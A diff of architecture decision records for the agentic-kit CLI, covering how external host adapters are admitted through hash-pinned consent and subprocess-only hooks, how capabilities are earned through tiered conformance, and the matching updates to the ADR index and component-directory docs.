+instead of Codex's MCP servers — consent lives outside the trusted boundary, attached to a specific
+byte sequence, never to an identity that content can silently drift underneath.
+
+### 7. No in-process third-party code, ever
+
+Every hook — lifecycle and execution alike — is a subprocess `ak` spawns and owns the termination
+proof of, on the same bounded-timeout, honest-diagnostics terms ADR-0016 §3 and ADR-0018's worker
+cleanup contract already hold built-in projections and workers to. `ak` never calls `import()` or
+`require()` on a path an adapter supplies, and an adapter's existence adds no npm dependency to
+`@pacphi/agentic-kit` — the package remains zero-runtime-dependency regardless of how many external
+adapters a user registers.
+
+### 8. The amended gate list
+
+The maintainer's PR #131 review found the proposal's in-tree gate list (its §8) materially
+incomplete for the in-process shape, and asked that any accepted design carry the complete list.
+The mechanism changed, but every named gap is a real, mechanism-independent seam in how `ak` treats
+"the host set" today, so all six remain load-bearing for the subprocess-hook design too. Status as
+observed in this worktree:
+
+| # | Gap (maintainer's review) | Disposition |
+|---|---|---|
+| 1 | **The import-time invariant.** `execution/adapters.mjs` enforced a *bidirectional* built-in↔routable-hosts check at import; a registry-only host flip to `canRouteActivities: true` ahead of its adapter landing would brick `ak run` for everyone. | **Done, wave 1.** `assertBuiltinAdaptersRoutable` now checks only the built-in→registry direction (an in-tree wiring mistake still throws at import, exactly as before); the reverse direction is a merge seam — `executionAdapterFor()` returns `null` and the runner degrades that one worker with `cli_unavailable`, per [ADR-0019](0019-escalation-in-ak-run.md)'s existing degradation precedent for a host with no adapter (`src/lib/execution/adapters.mjs`). |
+| 2 | **Uninstall-through-undo.** `ak uninstall` bypassed `runLifecycle` entirely; a third-party footprint would persist forever. | **Done, wave 1.** `uninstall.mjs` now runs registry-driven teardown for `hostsWithLifecycle()`, calling each host's own `undo` through `runLifecycle` — opencode-specific dispatch is gone; an admitted external host's `undo` hook runs on the identical path (`src/commands/uninstall.mjs`). |
+| 3 | **Permission authorization by host.** Setup's permission pass authorized only claude-host rules; `removeUndisclosedPermissions` would strip a non-claude host's permissions and fail setup. | **Done, wave 1.** `projectPermissionManifest` now unions the authorized auto-approve set across every *enabled* host's trust manifest (a host not gating on enablement always contributes; an opt-in host contributes once `cfg` enables it) instead of hardcoding claude's rules, with `hosts` injectable for tests (`src/commands/setup.mjs`). |
+| 4 | **Attribution-surfaces policy.** Three surfaces handled an unrecognized host differently and by accident: the usage scorecard collapsed it into `claude`, live sessions rewrote it to `'internal'`, and qe-court's `vendorOf` mapped it to a shared `'unknown'` — each capable of distorting a count in either direction. | **Done, Phase 0.** All three now exclude-and-label instead of silently collapsing: qe-court gives every unregistered id its own `unregistered:<id>` tag and excludes unregistered vendors from the diversity count entirely (`src/lib/qeCourt.mjs`); live events pass a safely-shaped unknown host id through verbatim and bucket anything unsafe as the explicit `'unknown-host'` (`src/lib/live/event-schema.mjs`); the usage scorecard buckets by `host ?? 'unknown'` rather than defaulting to `claude` (`src/lib/usage-index.mjs`). |
+| 5 | **Unknown-key warning.** `kit.json` silently round-trips unknown top-level keys, so `hostAdapters` on an ak version that predates this ADR is a silent no-op. | **Done, wave 1** (as a general mechanism, not one written for `hostAdapters` specifically). `loadKitConfig` now warns once per process per distinct unknown-key set — "kit.json keys not recognized by this ak version: …, preserved, ignored" — for *any* key the running version doesn't know, `hostAdapters` included on an older `ak` (`src/lib/config.mjs`). |
+| 6 | **Test pins.** ~12 assertions pinned the built-in host set directly, and the test-enforced registry↔directory parity meant a registered host with no authored About card failed CI. | **Working (wave 3, merged #148).** Host-set and default-map expectations across nine test files now derive from `managedHostIds()`/`routableHostIds()`/`primaryHostIds()`/`defaultHostMap()`, scoped to built-ins; the component-directory parity invariant is stated built-in-scoped, exempting admitted adapters until this contract graduates them. |
+
+## Supersession of ADR-0016's closed-registry clause
+
+ADR-0016 states, as a design requirement:
+
+> Agentic-kit remains a plain-ESM, zero-runtime-dependency CLI. Its normal operation is
+> offline-first. The design must therefore be a closed, validated registry of built-in code, not
+> an arbitrary third-party plugin runtime.
+
+and restates it in its non-goals:
+
+> It does not implement every provider, a public adapter SDK, or arbitrary third-party code
+> loading.
+
+**This ADR formally supersedes that clause.** The registry is no longer exclusively built-in code:
+an explicitly registered, hash-pinned, subprocess-only external adapter may be admitted into an
+overlay alongside it, gated by `AK_EXPERIMENTAL_HOST_ADAPTERS=1`. Every other requirement that
+clause was protecting — zero-runtime-dependency, offline-first normal operation, no dynamically
+imported third-party code inside the `ak` process — remains intact and is in fact the specific
+design this ADR uses to satisfy the request without reopening either property. ADR-0016 §1's
+sentence "Agentic-kit does not dynamically import adapter paths from `kit.json`, npm packages, or
+user directories" is superseded in the same, narrow sense: `kit.json` may now name an adapter
+manifest, but nothing under that name is ever `import()`-ed — the clause's *intent* (no in-process
+third-party code) is preserved even as its literal *mechanism description* (no `kit.json`-driven
+external reference of any kind) is not.
+
+A matching one-line update-note has been added to ADR-0016 itself, pointing here.
+
+## Non-goals
+
+- **No marketplace, discovery, or naming-convention scan.** Admission is always explicit
+  registration by manifest path; there is no `ak-host-*` npm-tree scan, ever — that is exactly the
+  fail-open pattern ADR-0023 exists to prevent, and PR #131's own proposal already rejected it for
+  the in-process shape.
+- **No code signing.** Consent is a hash pin plus explicit user confirmation, not a signature chain
+  or a claim of provenance beyond "this is the content the user agreed to run."
+- **No in-process plugin API, now or as a later contract version.** Contract v1's ban on `import()`
+  of adapter-supplied code is not a bootstrapping restriction to be lifted once the mechanism
+  matures; it is the property "Why the mechanism changed" argues for. A future contract version may
+  add driving surfaces (`acp`, `mcp`) or hook verbs; it may not add in-process code execution.
+- **No AQE projection, ever.** An admitted external host cannot become an `aqeProvider` at any
+  contract version — that field is schema-absent for the same reason `canBePrimary` and
+  `commandStatusline` are (§3), and AQE's own provider set is upstream's enumeration, not one `ak`
+  extends by admitting a host ([ADR-0028](0028-local-openai-compatible-providers.md) draws the
+  identical line for `local-openai`).
+- **No automatic routing or seeding.** An admitted host is never auto-seeded into `routing.routes`;
+  it must be explicitly routed, matching [ADR-0018](0018-generalized-host-worker-execution.md)'s
+  existing rule that automatic seeding stays Claude/Codex subscription-only.
+- **No subprocess/RPC protocol beyond the three named driving surfaces**, and no promise that `acp`
+  or `mcp` ship in this contract version. Re-specifying two lifecycles as a wire protocol is a
+  larger commitment than this ADR's evidence currently justifies.
+- **No vendoring of any specific third-party adapter into this repository**, and no obligation that
+  agentic-kit maintainers verify, support, or track the release cadence of any host an adapter
+  targets. An adapter author owns their host's correctness; `ak` owns only the contract.
+
+## Consequences
+
+- A fourth (fifth, …) host CLI can be described to `ak` without a dedicated ADR, owner module, or
+  maintainer commitment to a CLI they may not run — at the cost of everything that host can express
+  being strictly less than a built-in: no in-process code, three capped fields, and admission gated
+  behind an explicit flag and an explicit content-hash consent.
+- The gap the amended gate list closes was real independent of this ADR: items 1–5 harden the
+  built-in host set's own correctness (a registry-only routable-host flip, uninstall completeness,
+  permission authorization, attribution honesty, and unknown-key visibility) whether or not any
+  external adapter is ever registered. Publishing the extension point is what surfaced them; keeping
+  them fixed does not depend on the extension point staying enabled.
+- `AK_EXPERIMENTAL_HOST_ADAPTERS` being unset is the default, and the default behavior of every
+  existing command is unchanged: an unset flag makes the whole surface inert, and a `hostAdapters`
+  key with the flag unset round-trips through `kit.json` untouched.
+- A capability an external adapter cannot express (`canBePrimary`, `aqeProvider`,
+  `commandStatusline`) is a permanent property of contract v1, not a temporary restriction lifted at
+  graduation — graduation (below) freezes the *contract*, not the caps.
+
+## Self-graded implementation status
+
+Dated 2026-08-15, at Wave 4 doc-authoring time. Rows already covered by the amended gate list are
+not repeated; this table grades the mechanism this ADR newly decides — the manifest, admission,
+overlay, hook-runner, and consent — none of which existed as code prior to this wave. Grades:
+**Working** (implemented and tested in this worktree), **Demo** (implemented, not yet under test),
+**TBD** (not yet implemented as of this dating). Per the model set by ruflo's own ADR-015-v2
+practice — a self-graded status table an ADR carries at acceptance time, filled in with real
+evidence as implementation lands rather than promised in prose — the lead fills in test counts and
+flips remaining TBD cells at Wave 4 integration.
+
+| Mechanism | Grade (2026-08-15) | Evidence |
+|---|---|---|
+| Manifest schema (contract: 1) | TBD | Owned by the sibling contract work package; no schema module present in this worktree as of this dating. |
+| Admission gate (fail-closed, per-adapter isolated) | TBD | Owned by the sibling contract work package; not present in this worktree as of this dating. |
+| `AK_EXPERIMENTAL_HOST_ADAPTERS` flag gating | TBD | Not present in this worktree as of this dating; no occurrences found under `src/`. |
+| Admitted-host overlay (registry-adjacent, non-mutating) | TBD | Depends on the admission gate landing first. |
+| Subprocess hook-runner (`cli-subprocess` surface) | TBD | Owned by the sibling hook work package; not present in this worktree as of this dating. |
+| Hash-pinned consent + edit-invalidation | TBD | Owned by the sibling hook work package; not present in this worktree as of this dating. |
+| Capability-cap schema absence (§3) | TBD | Depends on the manifest schema landing first. |
+| Gate item 1 — import-time invariant | **Working** | `assertBuiltinAdaptersRoutable`, one-directional since W1-B (`src/lib/execution/adapters.mjs`). |
+| Gate item 2 — uninstall-through-undo | **Working** | Registry-driven `hostsWithLifecycle()` teardown loop (`src/commands/uninstall.mjs`). |
+| Gate item 3 — permission authorization by host | **Working** | `projectPermissionManifest` union-across-enabled-hosts, F-04 (`src/commands/setup.mjs`). |
+| Gate item 4 — attribution surfaces policy | **Working** | F-11 qe-court tagging (`src/lib/qeCourt.mjs`); `resolveHost` safe-passthrough/`unknown-host` (`src/lib/live/event-schema.mjs`); `host ?? 'unknown'` bucketing (`src/lib/usage-index.mjs`). |
+| Gate item 5 — unknown-key warning | **Working** | F-14 `warnUnknownTopLevelKeys` (`src/lib/config.mjs`). |
+| Gate item 6 — test pins (registry↔directory parity) | Working (wave 3, #148) | Registry-derived, built-in-scoped. |
+
+## Graduation gate
+
+Contract v1 is **experimental** for the life of the `4.0.0-alpha.*` line and remains so afterward
+until it explicitly graduates. Graduation is a written, falsifiable event, not a vibe:
+
+1. A **real external adapter** — maintained outside this repository, by someone other than an
+   agentic-kit maintainer — passes the full conformance kit (the same lifecycle, execution,
+   ownership, and `normalizedFacts` conformance tests a built-in host is held to, run against the
+   external adapter's declared hooks).
+2. That adapter then completes **one full release's worth of soak** in the field with no
+   contract-shape change required to keep it working.
+3. Only once both hold does the manifest **contract integer** freeze: `contract: 1` becomes a
+   guaranteed-stable shape, and any subsequent breaking change to the manifest, hook verbs, or
+   driving-surface vocabulary ships as `contract: 2`, admitted alongside `contract: 1` rather than
+   replacing it outright.
+
+Before graduation, `contract: 1` may change between alpha releases without a version bump. That
+instability is bounded, not open-ended: it exists to let the first real adapter's conformance run
+surface shape problems cheaply, the same way carrying Hermes surfaced one widening and one guard for
+the in-process proposal's own subprocess base. It is not a license to redesign the contract
+speculatively.
+
+## References
+
+- `src/lib/adapters/registries.mjs` (`HOST_REGISTRY`, `validateHostAdapter`, `validateRegistries`),
+  `src/lib/adapters/lifecycle.mjs` / `lifecycle-registry.mjs` (`validateLifecycleAdapter`,
+  `registerBuiltinLifecycle`), `src/lib/execution/adapters.mjs`
+  (`assertBuiltinAdaptersRoutable`, the merge seam), `src/commands/uninstall.mjs`
+  (`hostsWithLifecycle()` teardown loop), `src/commands/setup.mjs`
+  (`projectPermissionManifest`, `removeUndisclosedPermissions`), `src/lib/config.mjs`
+  (`KNOWN_TOP_LEVEL_KEYS`, `warnUnknownTopLevelKeys`), `src/lib/qeCourt.mjs` (F-11 unregistered-id
+  tagging), `src/lib/live/event-schema.mjs` (`resolveHost`, `SAFE_HOST_ID`), `src/lib/usage-index.mjs`
+  (host bucketing).
+- [ADR-0016](0016-capability-driven-integration-adapters.md) — the closed-registry clause this ADR
+  supersedes, and every capability/lifecycle/ownership/provenance contract this ADR reuses without
+  change.
+- [ADR-0018](0018-generalized-host-worker-execution.md) — the trust-boundary section this ADR's
+  "no host sandboxes extension code" evidence line rests on, and the worker termination-proof
+  discipline the subprocess hook-runner inherits.
+- [ADR-0019](0019-escalation-in-ak-run.md) — the `cli_unavailable` degradation precedent the
+  import-time invariant fix (gate item 1) generalizes.
+- [ADR-0023](0023-fail-closed-operations-and-explicit-degradation.md) — the fail-closed-and-honest
+  posture the admission gate and the ban on naming-convention discovery both apply.
+- [ADR-0028](0028-local-openai-compatible-providers.md) — the sibling ADR accepted from the same PR
+  #131, and the precedent for "accepted with corrections after review," which this ADR follows in
+  house style.
+- `docs/HOST-ADAPTER-EXTENSION-PROPOSAL.md` — the companion document PR #131 shipped alongside its
+  own draft of this ADR number; §§1–2 and §5 of that document remain accurate background even though
+  §3's in-process mechanism is not what this ADR accepts.
+- [PR #131](https://github.com/pacphi/agentic-kit/pull/131) — original proposal and its maintainer
+  review comment, the source of the amended gate list and the Hermes-behavior findings cited above.

--- a/docs/adr/0031-capability-graduation-and-upstream-requests.md
+++ b/docs/adr/0031-capability-graduation-and-upstream-requests.md
@@ -1,0 +1,191 @@
+# ADR-0031 — Capability graduation: earned parity for external host adapters, and the upstream request path
+
+- **Status:** Accepted (governance decision; implementation staged)
+- **Date:** 2026-08-16
+- **Deciders:** agentic-kit maintainers
+- **Related:** [ADR-0016](0016-capability-driven-integration-adapters.md),
+  [ADR-0018](0018-generalized-host-worker-execution.md),
+  [ADR-0019](0019-escalation-in-ak-run.md),
+  [ADR-0023](0023-fail-closed-operations-and-explicit-degradation.md),
+  [ADR-0029](0029-host-adapter-extension-point.md) (amends its "permanent caps" framing — see
+  [Amendment](#amendment-to-adr-0029))
+- **Amends:** ADR-0029, on one point only: the three capability caps are reframed from *permanent*
+  to *not self-declarable, but earnable*.
+
+## Context
+
+[ADR-0029](0029-host-adapter-extension-point.md) admitted external host adapters as a declarative
+manifest plus consented, subprocess-only hooks, behind `AK_EXPERIMENTAL_HOST_ADAPTERS=1`. To make
+the door safe, three capabilities were made **inexpressible** in the manifest schema —
+`canBePrimary`, `aqeProvider`, and `commandStatusline` — and ADR-0029 described that block as
+permanent.
+
+Two things push past that framing:
+
+1. **The product intent is full parity.** A host that clears conformance should be able to
+   participate exactly like a built-in — lead a run, own a status line, be accounted for in
+   quality — not sit permanently behind a glass wall. "Second-class forever" is not the goal;
+   "earn your way to first-class" is.
+
+2. **`ak` is downstream of two other systems.** [ruflo](https://github.com/ruvnet/ruflo)
+   orchestrates the agent loop and [agentic-qe](https://github.com/proffesor-for-testing/agentic-qe)
+   runs quality. Some parity ceilings are genuinely not `ak`'s to lift — they live upstream — and a
+   contributor chasing a conformance tier needs a real route to express what's missing, not a dead
+   end.
+
+This ADR resolves both. It keeps every safety property ADR-0029 established and adds the governance
+model that turns the caps from a wall into a ladder.
+
+## Decision
+
+### 1. Earned, never self-declared
+
+The manifest schema stays a **strict allow-list in which a capped capability is inexpressible**. An
+adapter can never *write down* that it is primary, an AQE provider, or a command-statusline owner.
+This is the safety invariant from ADR-0029 and it is permanent: self-declaration is the attack
+surface, so it stays closed forever.
+
+Parity comes through a **separate channel**. A capability is *earned* by passing a conformance tier
+and *granted* by the maintainer — recorded as a hash-pinned **capability grant** (the same
+edit-invalidation model as adapter consent), never as a field in the adapter's own manifest. The
+adapter never asserts the capability; conformance evidence plus an explicit maintainer grant confers
+it. `hostTierLabel()` and the registry already render behaviour from capabilities, so a granted
+capability lights up at every call site without special-casing.
+
+### 2. Tiered conformance
+
+Conformance becomes tiered rather than pass/fail. Each tier is a black-box test set — spawn the real
+host, assert the real behaviour, against an installed layout — that gates one capability:
+
+| Tier | Gates | Evidence shape |
+| ---- | ----- | -------------- |
+| `admission` | Registration through the fail-closed gate (ADR-0029, shipped) | manifest validates, admits, hooks run |
+| `session-driving` | `canDriveSession` — the host actually drives an interactive/oneshot session | a real session completes and is observed |
+| `activity-routing` | `canRouteActivities` — the host runs a supervised `ak run` worker to a structured result | a worker completes under the runner's contract (ADR-0018) |
+| `primary-eligible` | Grants `canBePrimary` — the host can *lead*: anchor routing, be escalated toward | leads a run and receives an escalation, per ADR-0019 |
+| `statusline` | Grants `commandStatusline` — renders a command-backed footer through supervised hooks | a footer renders and refreshes |
+
+Passing a tier records evidence; the maintainer's grant turns evidence into capability. A tier the
+adapter cannot meet because the capability is upstream is marked **gated** (§4), not failed.
+
+### 3. Two graduation destinations
+
+A conformed adapter lands in one of two places, the maintainer's call:
+
+- **Blessed external adapter** — added to a curated, hash-pinned list. It stays out-of-tree and
+  experimental, holding exactly the capabilities its tiers earned. Right for niche or long-tail
+  hosts the project does not want to own.
+- **Promoted built-in** — its host descriptor is adopted as a first-party registry entry. Because of
+  the registry-driven refactor delivered across Phases&nbsp;0–2, this is a small, ordinary PR (a
+  registry entry, a lifecycle adapter, an About card). Once built-in, the caps no longer apply
+  *because it is now first-party code the maintainer vouches for* — that is what promotion means. Its
+  hook scripts either ship bundled or are reimplemented as in-process glue, the maintainer's choice.
+
+### 4. The upstream capability-request path
+
+When a conformance tier cannot be met, the first question is **whose capability is missing**:
+
+- **`ak`-local** (run execution, the trust CLI, remote manifest sources, quality-gate anchors) — the
+  project's to build. A normal `ak` change; no one to wait on.
+- **Upstream — agentic-qe** — being a recognized **AQE provider type** is not `ak`'s to grant.
+  agentic-qe's provider set is a closed, upstream-defined enumeration (verified against
+  `agentic-qe@3.13.10`: `ALL_PROVIDER_TYPES` plus a `createProvider` switch, extended only by an
+  upstream code change). The path: file a concrete capability request against agentic-qe (a
+  provider-plugin API), record the tier as `gated: agentic-qe#NNN`, and light it up when the upstream
+  release ships. *Interim:* quality still runs through the model provider underneath the host, so QE
+  is not blocked — only the host's own AQE identity is.
+- **Upstream — ruflo** — being a native ruflo **backend** (an `ENABLE_*` target that drives the loop)
+  is defined inside ruflo (grounded against `ruvnet/ruflo@45e65b5`: backend enablement is per-host
+  `ENABLE_CLAUDE_CODE` / `ENABLE_CODEX` / `ENABLE_GEMINI_MCP`, not an outside registration). The path:
+  request a documented backend-registration surface upstream. *Interim:* the host runs through `ak`'s
+  own supervised execution, just not as a ruflo-native backend.
+
+The maintainer champions the request upstream with a named extension point, tracks the gated tier so
+an adapter's status shows exactly what it waits on, and exposes the capability in the adapter contract
+once upstream releases it. This is what keeps "no limitations after conformance" honest: the
+limitations that *are* real get a documented, per-layer route to disappear.
+
+### 5. The contributor-to-built-in lifecycle
+
+Graduation runs on a fixed sequence. A contributor **authors** a manifest and hooks,
+**self-tests** against the conformance kit, and **publishes** — at which point any user may opt in
+behind the experimental flag with hash-pinned consent, needing nothing from the maintainer. To go
+further, the contributor **proposes** it with a conformance report; the maintainer **verifies** by
+re-running the conformance kit and reviewing the hook scripts (the only part that executes),
+**decides** the tier and destination (§3), and **releases**. Conformance is objective; the
+maintainer is the judge; trust rests on reproduced evidence plus a hook read, never on running the
+contributor's code inside `ak`.
+
+### 6. Freeze criteria
+
+`contract: 1` (ADR-0029) freezes and the experimental flag is dropped when a **real** external
+adapter (Hermes first) clears the full conformance kit and survives one release of soak. Graduation
+of a capability tier and the freeze of the contract are distinct: tiers can be earned while the
+contract is still experimental.
+
+## Amendment to ADR-0029
+
+ADR-0029 states the three caps are permanent. This ADR amends that: **the block on
+*self-declaration* is permanent; the *capability* is earnable** through a conformance tier and a
+maintainer grant (§1, §2). ADR-0029's schema, admission gate, consent model, and hook runner are
+unchanged — capability grants are additive and live outside the manifest. A matching update note is
+added to ADR-0029 pointing here.
+
+## Consequences
+
+- An external adapter has a documented, evidence-gated route to full parity, up to and including
+  shipping as a built-in — without ever loading third-party code into the `ak` process and without
+  ever letting a manifest self-assert a capability.
+- The maintainer's review burden is bounded and objective: reproduce a conformance report, read the
+  hooks, grant a tier. No new trust primitive beyond the hash-pinned grant.
+- Real upstream ceilings are neither hidden nor faked: they become tracked capability requests with
+  an honest interim behaviour and a light-up path.
+- `ak` positions itself as the integrator that *shapes* its substrates rather than only consuming
+  them — the upstream-request path is a first-class part of the model, not a footnote.
+
+## Implementation status
+
+Per the ADR discipline this repository adopted (a dated, self-graded table before an Accepted claim
+rests on delivery): the **governance decision** is accepted; the **machinery** is staged and mostly
+unbuilt. This table is the source of truth for what is real.
+
+| Piece | Status (2026-08-16) | Note |
+| ----- | ------------------- | ---- |
+| Admission gate, consent store, hook runner, conformance kit (`admission` tier) | **Working** | ADR-0029, merged (PR #149) |
+| `ak host adapters trust` CLI (records consent/grants) | **Proposed — not built** | Smallest next step; today admission refuses `consent-required` |
+| External execution (`ak run` drives an admitted host) | **Proposed — not built** | The seam is a comment-only lookup today |
+| External lifecycle execution wired into setup/sync/uninstall | **Proposed — not built** | Loops are built-in-scoped by design until generalized |
+| Tiered conformance harness (`session-driving` … `statusline`) | **Proposed — not built** | Extends the single conformance kit |
+| Capability-grant store + promotion command | **Proposed — not built** | Hash-pinned, mirrors consent |
+| Remote manifest sources (npm / URL) + resolve→hash ordering | **Proposed — not built** | File-path manifests only today |
+| Upstream request tracking (`gated: <repo>#NNN` against a tier) | **Proposed — not built** | Needs a place to record per-tier gating |
+| A real external adapter (Hermes) clearing the kit → contract freeze | **Not started** | Freeze criterion (§6) |
+
+## Alternatives considered
+
+- **Keep the caps permanent (ADR-0029 as written).** Rejected: it makes external hosts second-class
+  forever and contradicts the product intent of full parity after conformance.
+- **Let the manifest self-declare capabilities, checked at runtime.** Rejected outright. This is
+  ruflo's own cautionary tale, surfaced in the research sweep behind this work: a fully typed
+  capability-permission system shipped with *zero runtime enforcement*. Runtime checks on a
+  self-asserted capability are exactly the honor-system trap the strict-allow-list schema exists to
+  avoid. Self-declaration stays inexpressible; capability comes from earned evidence plus an explicit
+  grant.
+- **Treat every ceiling as `ak`-local and build around upstream.** Rejected as dishonest and
+  unmaintainable: agentic-qe's provider enum and ruflo's backend model are upstream facts. Faking a
+  local shim (e.g. projecting an unknown host into agentic-qe's config) would fabricate an identity
+  the upstream tool never declared it understands. The upstream-request path (§4) is the honest
+  alternative.
+
+## References
+
+- ADR-0029 (the extension point, schema, admission, consent, hook runner) and its amendment above.
+- ADR-0018 (supervised worker contract), ADR-0019 (bounded escalation) — the substance of the
+  `activity-routing` and `primary-eligible` tiers.
+- Upstream facts grounded in a source-cited research sweep: `agentic-qe@3.13.10`
+  (`ALL_PROVIDER_TYPES`, the `createProvider` switch, the closed provider enum) and
+  `ruvnet/ruflo@45e65b5` (`ENABLE_*` backend model). Re-verify against upstream HEAD before filing an
+  actual capability request.
+- Companion explainer for consumers and implementers:
+  [`docs/HOST-EXTENSIBILITY-EXPLAINER.html`](../HOST-EXTENSIBILITY-EXPLAINER.html); design dossier:
+  [`docs/ADAPTER-CONTRACT-DOSSIER.html`](../ADAPTER-CONTRACT-DOSSIER.html).

--- a/docs/adr/README.md
+++ b/docs/adr/README.md
@@ -36,6 +36,7 @@ Consequences**, and cites the grounded source it rests on where relevant.
 | [0025](0025-machine-footprint-metrics.md) | Machine footprint: infrastructure metrics for install, runtime, storage, and catalog | Implemented |
 | [0026](0026-about-component-directory.md) | About: a component directory that explains everything ak installs | Implemented |
 | [0027](0027-shared-project-census.md) | One project census, four scopes, every count explains itself | Implemented |
+| [0028](0028-local-openai-compatible-providers.md) | One generic local OpenAI-compatible provider, not a vendor enumeration | Accepted |
 
 Theme: ADRs **0001–0006** define **dual-host LLM routing and leadership** — how `ak` lets ruflo route
 each development activity (architecture, implementation, testing, review, …) to the right host (Claude
@@ -187,3 +188,14 @@ it, while Intelligence folds a repo's sub-directories and throwaway agent worktr
 identity because that is what a user picks — a distinction that was also a live bug, since keying
 the picker off identity while listing directories made 7 of 24 rows unreachable. Counts that remain
 different stay different, and say why.
+
+**0028** adds a second local provider, `local-openai`, because a local model is normally served as
+an OpenAI-compatible endpoint on loopback — MLX, LM Studio, `llama.cpp`, vLLM — and frequently under
+a name the *user* chose, which no vendor enumeration can cover; the registry previously knew only
+`ollama`. It deliberately claims less than `ollama` (no catalogue, no runtime probe, no digest),
+puts the runtime's identity in the binding's endpoint rather than in the provider id, and projects
+to `['ruflo', 'codex', 'opencode']` only — no `claude` (the row claims only the OpenAI-compatible
+transport) and no `aqe` (AQE's provider set is upstream's own enumeration; `ollama` is in it,
+`local-openai` deliberately is not). Proposed by community contributor adrianco in PR #131, accepted
+with a correction to the PR's quoted Hermes reference config, whose `api_mode: openai` is not a
+valid Hermes value.

--- a/docs/adr/README.md
+++ b/docs/adr/README.md
@@ -38,6 +38,7 @@ Consequences**, and cites the grounded source it rests on where relevant.
 | [0027](0027-shared-project-census.md) | One project census, four scopes, every count explains itself | Implemented |
 | [0028](0028-local-openai-compatible-providers.md) | One generic local OpenAI-compatible provider, not a vendor enumeration | Accepted |
 | [0029](0029-host-adapter-extension-point.md) | External host adapters: declarative manifest, subprocess hooks | Accepted (experimental contract) |
+| [0031](0031-capability-graduation-and-upstream-requests.md) | Capability graduation: earned parity for external adapters, and the upstream request path | Accepted (governance; implementation staged) |
 
 Theme: ADRs **0001–0006** define **dual-host LLM routing and leadership** — how `ak` lets ruflo route
 each development activity (architecture, implementation, testing, review, …) to the right host (Claude
@@ -213,3 +214,14 @@ routable-host invariant, uninstall-through-undo, permission authorization by hos
 surfaces policy, and kit.json's unknown-key warning — landed in wave 1 and Phase 0; registry↔directory
 test pins remain wave 3), and stays experimental until a real external adapter clears the
 conformance kit and a release of soak.
+
+**0031** amends 0029 on one point and adds the governance around it. The three capability caps
+(`canBePrimary`, `aqeProvider`, `commandStatusline`) stay *inexpressible* in the manifest — that
+block on self-declaration is permanent — but the capability itself becomes *earnable*: passing a
+conformance tier plus an explicit maintainer grant (hash-pinned, outside the manifest) confers it,
+up to and including promotion to a first-party built-in with full parity. It also records the
+upstream-request path: some ceilings are not `ak`'s to lift (being an AQE provider type is
+agentic-qe's closed enum; being a native ruflo backend is ruflo's `ENABLE_*` model), so those become
+tracked capability requests with honest interim behaviour rather than pretended support. Accepted as
+a governance decision; the machinery (the trust CLI, external execution, tiered conformance, the
+grant store) is staged and self-graded in the ADR's implementation-status table.

--- a/docs/adr/README.md
+++ b/docs/adr/README.md
@@ -24,7 +24,7 @@ Consequences**, and cites the grounded source it rests on where relevant.
 | [0013](0013-admin-build-security-signals-and-honest-reach.md) | Admin: build/security signals, an honest Reach panel, and a pagination fix | Accepted |
 | [0014](0014-dashboard-auth-and-remediation.md) | Dashboard auth token, plus a security/quality remediation pass | Accepted |
 | [0015](0015-managed-codex-native-statusline.md) | Manage Codex's native user-wide status line without claiming rich-renderer parity | Accepted |
-| [0016](0016-capability-driven-integration-adapters.md) | Capability-driven host, provider, binding, projection, and observability adapters | Accepted; compatibility amended |
+| [0016](0016-capability-driven-integration-adapters.md) | Capability-driven host, provider, binding, projection, and observability adapters | Accepted; compatibility amended; closed-registry clause superseded by 0029 |
 | [0017](0017-opencode-host.md) | OpenCode as a managed, observable host through native surfaces | Accepted; compatibility amended |
 | [0018](0018-generalized-host-worker-execution.md) | Generalized host-worker execution; `ak run` canonical | Accepted; compatibility amended |
 | [0019](0019-escalation-in-ak-run.md) | Bounded per-worker escalation in `ak run` | Accepted; historical context closed |
@@ -37,6 +37,7 @@ Consequences**, and cites the grounded source it rests on where relevant.
 | [0026](0026-about-component-directory.md) | About: a component directory that explains everything ak installs | Implemented |
 | [0027](0027-shared-project-census.md) | One project census, four scopes, every count explains itself | Implemented |
 | [0028](0028-local-openai-compatible-providers.md) | One generic local OpenAI-compatible provider, not a vendor enumeration | Accepted |
+| [0029](0029-host-adapter-extension-point.md) | External host adapters: declarative manifest, subprocess hooks | Accepted (experimental contract) |
 
 Theme: ADRs **0001–0006** define **dual-host LLM routing and leadership** — how `ak` lets ruflo route
 each development activity (architecture, implementation, testing, review, …) to the right host (Claude
@@ -199,3 +200,16 @@ transport) and no `aqe` (AQE's provider set is upstream's own enumeration; `olla
 `local-openai` deliberately is not). Proposed by community contributor adrianco in PR #131, accepted
 with a correction to the PR's quoted Hermes reference config, whose `api_mode: openai` is not a
 valid Hermes value.
+
+**0029** answers the same PR #131 with a different mechanism than it proposed. Where the PR asked
+for an in-process ESM module loaded by `import()`, this ADR accepts a declarative manifest driving
+a fixed set of consented, subprocess-only hooks — no third-party code ever runs inside the `ak`
+process, gated behind `AK_EXPERIMENTAL_HOST_ADAPTERS=1`, admitted only after a hash-pinned consent
+that invalidates the moment the manifest's content changes. `canBePrimary`, `aqeProvider`, and
+`commandStatusline` are not fields the manifest schema accepts at all, so those three obligations
+stay first-party by construction rather than by an adapter's own promise. It formally supersedes
+ADR-0016's closed-registry clause, folds in the maintainer's full PR #131 gate list (import-time
+routable-host invariant, uninstall-through-undo, permission authorization by host, attribution
+surfaces policy, and kit.json's unknown-key warning — landed in wave 1 and Phase 0; registry↔directory
+test pins remain wave 3), and stays experimental until a real external adapter clears the
+conformance kit and a release of soak.

--- a/docs/ddd/component-directory.md
+++ b/docs/ddd/component-directory.md
@@ -161,8 +161,12 @@ takes the worst of the pair, so the quieter one's health cannot hide behind the 
    no endpoint, and a failed status join degrades chips to `unknown` without hiding cards.
 3. **Prose never claims runtime state.** Installed/version/configured render exclusively as
    chips fed by detection; the paragraph reads true on any machine.
-4. **Registry↔directory parity is a test.** Every managed tool has exactly one entry; no entry
-   exists for something ak neither installs nor configures.
+4. **Registry↔directory parity is a test, scoped to built-in adapters.** Every managed tool
+   shipped in the built-in registry has exactly one entry; no entry exists for something ak
+   neither installs nor configures. There is no dynamic or third-party host concept yet, so
+   today "built-in" and "the registry" are the same set; an externally-admitted adapter is
+   exempt from this parity gate until the wave-4 adapter-extension contract graduates it to a
+   card-carrying citizen.
 5. **Links are `https`, named-host, user-initiated**; the kit fetches none of them; all are
    covered by the nightly external link sweep.
 6. **Official marks only where genuinely official and already shipped**; everything else is an

--- a/docs/ddd/component-directory.md
+++ b/docs/ddd/component-directory.md
@@ -108,7 +108,7 @@ lintable where mechanical):
 ### Iconography
 
 Official marks are used only where the dashboard already ships them as official — the three
-host SVGs Observability renders on session rows — and are reused byte-identically so a
